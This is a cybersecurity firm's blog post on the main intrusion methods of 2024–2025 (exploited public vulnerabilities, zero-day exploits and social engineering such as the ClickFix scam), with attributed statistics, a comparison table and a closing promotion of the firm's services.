Social Engineering accounted for 36% of all intrusion points between May 2024 and 2025, according to Palo Alto Networks. It surpassed malware and software vulnerabilities for the top spot. IBM found that credential theft was the top access point last year, accounting for 30% of system invasions. These figures support the notion that cybercriminals prefer to log in instead of hack in, exploiting humans to gain access to systems.
Recent Trends in Cyberattacks: Which Entry Methods Are on The Rise
While social engineering stands out at the top, the last year has seen the rise of multiple entry techniques. Cybercriminals have put new twists on some familiar formulas, utilizing advancements in technology and online communication. Our analysts most frequently encounter the following infiltration methods.
Public Vulnerabilities
These types of attacks occur when documented vulnerabilities are targeted to gain unauthorized access to a system. They often consist of exploiting outdated software or misconfigured systems.
There were 23,581 new vulnerabilities published by Common Vulnerabilities and Exposures (CVE) in the first half of 2025. This averages out to roughly 130 new CVEs per day, a 15% increase from 2024.
Despite social engineering taking the top spot, experts documented a rise in public vulnerabilities exploited in 2024. There were 768 CVEs identified vulnerabilities reported in the wild last year, up 20% from 2023.
IBM found that 30% of the incidents they responded to in 2024 involved exploitation of public-facing applications. They cited patch management challenges as a major culprit. On top of this, 25% of these cases involved active scanning after entry — allowing for further exploitation.
This upward trend has continued in 2025. The first quarter of the year saw 159 CVE identified vulnerabilities exploited, up from 151 the year prior. Furthermore, 28.3% of these vulnerabilities were exploited within 24 hours of their CVE publication.
These attacks are popular among cybercriminals because they are cheap and require minimal effort. Cybercriminals buy and sell Access as a Service (AaaS) kits for these exploits on the dark web. The flip side of this is that they are often patched quickly with software updates.
Zero-Day Exploits
These types of attacks target vulnerabilities that are unknown to developers and the public. The name comes from the number of days the developer has to patch vulnerabilities before an exploit occurs— zero.
Zero-day attacks often target large organizations, specifically government agencies and software developers. The cybercriminal needs to gain access to the program’s code to identify vulnerabilities before the developer has an opportunity to recognize and patch them.
This information is typically obtained by large hacking groups, some of which are state-funded. Cybercriminals may then sell this data on dark web marketplaces, increasing accessibility and expanding the scope of exploit.
Fore scout Technologies noted a 46% increase in zero-day exploits in the first half of 2025. This is on pace to break the record-high 100 zero-day exploits reported just last year, continuing an upward trend.
This past March, there were 19 zero-day exploits — the most in any individual month over the last three years. The lowest number of zero-day attacks in a one-month span this calendar year has been seven.
Social Engineering
As we previously stated, cybercriminals have been increasingly relying on human error rather than technical workarounds to infiltrate systems. 2025 has seen social engineering not only take over the top infiltration slot, but also take on new forms.
Two methods that stand out are high-touch compromise and at-scale deception. The former involves cybercriminals impersonating staff members using stolen credentials. They then escalate their access discretely and without malware, opting to manipulate help desks.
At-scale deception occurs when bad actors manipulate users to download malware through pop-up ads and SEO-boosted malicious links. An example of this is the ClickFix scam campaign, where cybercriminals tricked unsuspecting users into copying and pasting malicious code into their device’s terminal.
This is done through a malicious or compromised website. When the user opens the page, they are met with a pop-up instructing them to copy and paste the code to allegedly fix an issue on the device. When the code is pasted, further malicious programs are injected onto the device.
The majority of social engineering cases continue to derive from phishing attacks, accounting for 65% of entry points reported. However, the development of new methods displays the evolution of this strategy that has led to its expanded popularity.
In addition to this level of magnitude, cases of infiltration from social engineering also yield higher odds of exposure. Social engineering attacks resulted in data exposure in a whopping 60% of cases. This is a 14% increase over the exposure rate when looking at all infiltration cases.
Our experts expect these trends to continue as cybercriminals increasingly use artificial intelligence to enhance their social engineering scams. Generative AI can automate and refine phishing attacks with convincing emails, deepfake media, and fraudulent online profiles.
Comparison Table
| Type of Attack | Accessibility | Effectiveness | Attacker Risk | Frequency | Example |
|---|---|---|---|---|---|
| Public Vulnerabilities | High | Moderate | Low | Common | RDP on an exposed server |
| Zero-Day Exploits | Very Low | Very High | Very High | Rare | 0-day in a browser |
| Social Engineering | High | High | Moderate | Constant | Email phishing campaign |
Why Every Intrusion Method Should Be Taken Seriously
Social engineering may be the most common form of infiltration, but it doesn’t mean you should underestimate other tactics. Each entry method holds the potential to do worlds of damage to both individuals and entire corporations.
Furthermore, cybercriminals often use a hybrid approach and combine features of multiple entry techniques in one scam. A prime example is the Clickfix scam, where cybercriminals used social engineering to deploy Remote Access Trojans (RAT) to perpetuate the crime.
Because of this, our experts recommend that all users are aware of these threats and the systems themselves have a layered defense. It is not enough to rely on security software. Organizations must also train the users of their system and put proper procedures in place to avoid unauthorized access.
Practical Takeaway from Digital Forensics Corp.
The team at Digital Forensics Corp. brings hands-on expertise in defending against threats across all three levels outlined above. Our experts are SOC 2 certified among other digital forensics and security certifications. We understand that modern threat actors rarely limit themselves to one approach, and we constantly adapt with modern techniques.
We can evaluate your current security system to identify any vulnerable points and suggest resolutions. Our experts can also collaborate with your IT team to ensure the implementation of our suggestions is successful. Lastly, we can help you build multi-layered defense strategies that address both the human and technical sides of risk. Contact us today or explore our cybersecurity services page to learn more about the solutions we can provide.
